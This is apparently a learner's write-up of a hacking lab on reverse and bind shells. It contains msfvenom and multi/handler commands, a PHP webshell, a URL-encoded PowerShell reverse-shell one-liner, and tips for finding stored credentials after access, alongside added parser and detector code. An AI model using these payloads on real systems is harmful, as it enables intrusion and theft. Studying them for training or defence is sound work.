An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.
Time for a new series during the #FromZeroToHacker challenge.
Table of contents
- Introduction
- What I have learnt today?
- Stats
- Resources
Introduction to What the Shell?
A shell is what we use to interface with the operating system’s services. While there are shells with a GUI (Graphical User Interface), we normally use a Command Line Interface (CLI).
When targeting remote systems, sometimes we can force a remote server to send us command line access to the server (a reverse shell) or to open up a port on the server to which we can connect (a bind shell).
What I have learnt today?
msfvenom
Msfvenom is the one-stop-shop for all things payload related.
Part of the Metasploit framework, msfvenom generates code for reverse and bind shells. While msfvenom has loads of uses, we are going to focus on payload generation: it produces shellcode (including raw hexadecimal shellcode for lower-level exploit development) in various output formats (.exe, .aspx, .py, .war…).
This is its syntax:
```
msfvenom -p PAYLOAD OPTIONS
```
For example, to generate a Windows x64 reverse shell in .exe format:
```
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=:LOCAL_IP: LPORT=:LISTEN_PORT:
```
Staged vs Stageless
There are two types of reverse shell payloads:
- Staged payloads are sent in two parts. The first one is the stager, executed directly on the server itself. It connects back to our listener and uses that connection to load the real payload. So we have two parts: the small initial stager, and the bulkier reverse shell code. This requires a special listener, the Metasploit multi/handler (more about this later).
- Stageless payloads are more common, and the ones we have been using until now. They are a single, self-contained piece of code that sends a shell back to the listener when executed.
Stageless payloads are easier to use, but also bulkier and easier for an antivirus to discover and block. Staged payloads are sneakier, as the initial stager is smaller and easier to slip past intrusion detection programs, but they are also harder to use.
However, modern antivirus uses the Anti-Malware Scan Interface (AMSI) to inspect the payload the stager loads into memory, which makes this technique less effective than it used to be.
Meterpreter
Meterpreter is Metasploit’s own fully featured shell. Completely stable and working with Windows targets too, it has a lot of built-in functionality of its own (file uploads, file downloads, etc.).
Payload naming conventions
The basic convention is:
`OS/ARCH/PAYLOAD`
For example, to generate a stageless reverse shell for an x86 Linux target:
`linux/x86/shell_reverse_tcp`
For Windows 32-bit targets, the arch is not needed:
`windows/shell_reverse_tcp`
Stageless payloads are denoted with underscores, like the ones we have just seen. The staged equivalent would be:
`windows/shell/reverse_tcp`
The logic behind this? I don’t know, it just is what it is.
As you saw, there are loads of payloads and luckily, for people like me with a short memory, we have `msfvenom --list payloads`.
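As an added example (not code from the original post or from Metasploit), here is a small Python parser that applies these naming rules, including the omitted-arch case for 32-bit Windows, and reports which payloads need the multi/handler listener rather than a plain one; the list of architecture names is an assumption.

```python
"""Parse msfvenom payload names by the OS/ARCH/PAYLOAD convention from the post.
Added example, not code from the original post or from Metasploit. Rules
implemented: a stageless payload joins its parts with underscores, a staged
one with a slash, and 32-bit Windows payloads omit the ARCH component.
Only the OS/ARCH/PAYLOAD form is handled (not e.g. cmd/unix/... payloads).
"""
from dataclasses import dataclass

# Architectures that may fill the ARCH slot (assumed list, not exhaustive).
KNOWN_ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}

@dataclass(frozen=True)
class PayloadInfo:
    os: str
    arch: str          # "x86" when ARCH is omitted (the Windows 32-bit case)
    payload: str       # "shell_reverse_tcp" (stageless) or "shell/reverse_tcp" (staged)
    staged: bool       # stager + second stage: needs multi/handler
    meterpreter: bool  # Meterpreter sessions also need multi/handler

def parse_payload(name: str) -> PayloadInfo:
    parts = [p for p in name.strip().lower().split("/") if p]
    if len(parts) < 2:
        raise ValueError(f"not an OS/ARCH/PAYLOAD name: {name!r}")
    os_name, rest = parts[0], parts[1:]
    if rest[0] in KNOWN_ARCHES:
        arch, rest = rest[0], rest[1:]
    else:
        arch = "x86"  # ARCH omitted: the 32-bit default the post describes
    if not rest:
        raise ValueError(f"missing PAYLOAD component: {name!r}")
    return PayloadInfo(
        os=os_name,
        arch=arch,
        payload="/".join(rest),
        staged=len(rest) > 1,  # a slash between stager and stage means staged
        meterpreter=rest[0].startswith("meterpreter"),
    )

def needs_multi_handler(name: str) -> bool:
    """Staged and Meterpreter payloads need Metasploit's multi/handler listener."""
    info = parse_payload(name)
    return info.staged or info.meterpreter
```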
Metasploit multi/handler
Multi/Handler is a superb tool for catching reverse shells, and is essential if we want to use Meterpreter shells.
This is how to use it:
- First, open Metasploit with `msfconsole`.
- Then, type `use multi/handler` and press Enter.
Now, we are primed to start a multi/handler (staged) session. Let’s take a look at the available options using the `options` command:
As we can see, there are three options we need to set: the payload, specific to our target, as well as the listening address and port (LHOST and LPORT). To set them, we use the following commands:
- `set PAYLOAD :PAYLOAD:`
- `set LHOST :LOCAL_IP:`
- `set LPORT :LOCAL_PORT:`
Now, we start the listener with the `exploit -j` command, which tells Metasploit to launch the module as a job in the background:
Note: as we are using a port under 1024, we need to run `msfconsole` with sudo permissions.
Now, if the staged payload generated in the previous task is run, Metasploit receives the connection, sends the remainder of the payload, and finally gives us a reverse shell:
![[day_038_connection_created.png]]
As we backgrounded multi/handler, we need to use `sessions 1` to foreground it again.
Webshells
Sometimes, we find websites that allow us to upload an executable file. This is a golden opportunity to upload malicious code that can activate a reverse or bind shell. And sometimes, the developers are aware of our nefarious arts, making it impossible to create a shell.
Well, maybe not impossible, thanks to Webshells.
A webshell is a script that runs inside a web server (written in Python, PHP, ASP…) and executes commands on the server. The commands are entered into a webpage (via an HTML form or arguments in a URL), executed by the script, and the results are returned to the page. This is pretty useful when firewalls get in the way, or as a stepping stone to a full reverse or bind shell.
Let’s see an example with PHP, a popular programming language:
```php
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
```
This script reads the `cmd` GET parameter from the URL and executes it on the system thanks to `shell_exec()`. Any command we enter after `?cmd=` will be executed on the system (Windows or Linux):
![[day_038_webshell.png]]
In this example, we use the `cmd` GET parameter with the command ifconfig, which returns the network information of the box, as if it were the terminal.
We can find more web shells available on Kali in the `/usr/share/webshells` folder.
When the target is Windows, it is sometimes easier to obtain RCE through a web shell by pasting the following into the URL as the `cmd` argument:
```
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
```
Yes, this horrendous command is what we found on What the Shell? Part 1.
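From the defender's side, the webshell above leaves two obvious traces: the `shell_exec($_GET[...])` shape in the PHP file and `?cmd=` requests in the access log, the PowerShell one-liner among them once URL-decoded. As an added example (not code from the original post or any tool it mentions), this Python script flags both; the log lines are constructed and the indicator lists are assumptions to tune per environment.

```python
"""Spot webshell use in web logs and webshell code at rest.
Added example, not code from the original post or any tool it mentions.
Parses constructed Apache-style access log lines, decodes the `cmd` query
parameter the post's PHP one-liner reads, and flags values that look like
system commands or the PowerShell TCPClient one-liner the post quotes.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic (not real). Line 3 carries a truncated,
# URL-encoded form of the PowerShell reverse-shell one-liner from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2023:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [12/Jan/2023:10:01:07 +0000] "GET /uploads/avatar.php?cmd=ifconfig HTTP/1.1" 200 1024
10.0.0.9 - - [12/Jan/2023:10:01:30 +0000] "GET /uploads/avatar.php?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.0.0.9%27%2C4444%29%22 HTTP/1.1" 200 0
10.0.0.5 - - [12/Jan/2023:10:02:00 +0000] "GET /search.php?cmd=hello%20world HTTP/1.1" 200 300
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Coarse indicators: recon binaries and reverse-shell building blocks (assumed list).
# Very short names such as "id" or "nc" are left out because they are too noisy.
SUSPICIOUS = re.compile(
    r'\b(ifconfig|ipconfig|whoami|uname|netstat|powershell|cmd\.exe|bash -i)\b'
    r'|/etc/passwd|/dev/tcp|TCPClient|GetStream|\biex\b', re.IGNORECASE)
# A request parameter flowing straight into a PHP shell function (the post's one-liner).
PHP_WEBSHELL = re.compile(
    r'\b(shell_exec|system|passthru|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b',
    re.IGNORECASE)

def decode_cmd(target):
    """Percent-decoded `cmd` query value of a request target, or None."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("cmd")
    return values[0] if values else None

def find_webshell_requests(log_text):
    """One hit per log line whose decoded `cmd` matches an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        cmd = decode_cmd(m["target"]) if m else None
        ind = SUSPICIOUS.search(cmd) if cmd else None
        if ind:
            hits.append({"ip": m["ip"], "path": urlsplit(m["target"]).path,
                         "cmd": cmd, "indicator": ind.group(0)})
    return hits

def looks_like_php_webshell(source):
    """True if PHP source passes a request parameter straight into a shell function."""
    return PHP_WEBSHELL.search(source) is not None
```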
Next steps
Ok, we finally have a shell! Now…what?
On Linux, we would be looking for opportunities to gain access to a user account. SSH keys are stored at `/home/:USER:/.ssh` and are often an ideal way to do this. Some exploits will even allow you to add your own account.
On Windows, the options are more limited. We can find passwords for running services in the registry. VNC servers frequently leave passwords in the registry stored in plaintext (!). Some versions of the FileZilla FTP server also leave credentials in an XML file at `C:\Program Files\FileZilla Server\FileZilla Server.xml` or `C:\xampp\FileZilla Server\FileZilla Server.xml`. These can be MD5 hashes or plaintext.
Ideally, on Windows, we would obtain a shell running as the SYSTEM user or an admin account. From there it is possible to create your own admin account and log in over RDP, Telnet, Winexe, etc.
In summary, reverse and bind shells are a great way to gain remote code execution, but they will never be as fully featured as a native shell. Ideally, we will escalate into using a normal method for accessing the machine, as it is easier to use for further exploitation of the target.
Summary
In the second part of What the Shell?, we saw:
- What msfvenom is and how to use it.
- How to create staged reverse shells with Metasploit Multi/handler.
- Webshells.
- What to do after gaining access to a machine.
Stats
From 114.368th to 113.663th. Sitting right now in the Top 6%.
Here is also the Skill Matrix:
Resources
- Random Room
Other resources
- Reverse Shell Cheat Sheet
- SecLists
- Precompiled Socat binary
- PayloadAllTheThings